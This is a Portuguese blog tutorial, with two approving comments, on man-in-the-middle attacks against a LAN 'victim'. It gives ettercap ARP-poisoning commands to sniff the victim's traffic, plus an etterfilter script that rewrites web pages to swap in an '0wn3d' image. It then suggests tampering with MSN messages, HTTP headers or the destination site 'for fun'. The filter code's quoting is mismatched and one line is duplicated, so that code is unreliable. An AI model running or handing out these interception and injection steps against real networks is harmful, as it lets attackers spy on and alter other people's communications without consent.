Monitorando o tráfego da vítima: (arpspoof)
Não vou me atentar aqui a explicar o que é um arpspoff e/ou arp poison essas informações podem ser encontradas no link a seguir:
http://en.wikipedia.org/wiki/ARP_spoofing
Vamos tentar sniffar o tráfego de uma estação da rede local para saber o que a "vítima esta acessando" através do gateway.
Para isso usaremos o ettercap na maquina do atacante:
No ettercap usaremos as seguintes opções:
-T ==> Para executar o ettercap em modo texto
-q ==> Para não ficar printando os pacotes capturados na tela
-p ==> Para a interface "NÃO" entrar em modo promíscuo
-M arp:remote ==> Para executar o arp poison somente entre o gateway e a vítima
Deixando o comando assim:
# ettercap -T -q -p -M ARP:remote // /10.1.1.2/
Assim todo o tráfego da estação da "vítima" estara passando pela sua estação antes de ir para o gateway, assim você pode sniffar o tráfego da vítima usando o tcpdump ou wireshark.
Agora vamos incrementar a brincadeira... :p
Vamos criar um script para que quando a vítma acesse o site com figura X seja exibida a figura Y no lugar da figura X. para isso vamos achar um site que queremos alterar para a vítima (Exemplo www.origsite.com) depois vamos definir a figura que queremos alterar. (Ex.: www.origsite.com/images/logo.png) Agora definimos a figura que queremos que apareça no lugar da figura "logo.png". (Ex.: www.fakesite.org/0wn3d.jpeg) Agora vamos criar o filtro para o ettercap.
Crie um arquivo com o seguinte conteúdo:
---
if (ip.proto == TCP && tcp.src == 80) {
replace(img src=\"http://origsite.com/images/logo.png\"", "img src=\"http://fakesite.org/0wn3d.jpeg\"");
replace(img src=\"http://origsite.com/images/logo.png\"", "img src=\"http://fakesite.org/0wn3d.jpeg\"");
msg("Imagem Alterada. \n");
}
--
Salve o arquivo (Ex.: fake-site.filter) e compile com o seguinte comando:
# etterfilter fake-site.filter -o fake-site.ef
Se não houver nenhum erro de compilação, será criado o arquivo "fake-site.ef", para utiliza-lo basta executar o mesmo comando ettercap anterior adicionando apenas a opção -F e o nome do arquivo "fake-site.ef" como a seguir:
# ettercap -T -q -p -F fake-site.ef -M ARP:remote // /10.1.1.2/
Pronto agora toda vez que o usuário da maquina 10.1.1.2 acessar o site www.origsite.com o logo exibido será o do site www.fakesite.org.
Com um entendimento de como funciona os filtros ettercap podemos fazer muitas coisas divertidas como por exemplo alterar o conteúdo de uma msg do msn, header da requisição http ou até mesmo o site de destino que o cara esta acessando, basta usar a criatividade... =p
Obs.: Todos os sites citados neste artigo são fictícios e o autor não se responsabiliza por qualquer dano que possa ser causado por executar os omandos contidos no texto supra-citado.
Happy Hacking..
By CleBeer
2 comentários:
Muito bom o seu tutorial.
Show mano!
Postar um comentário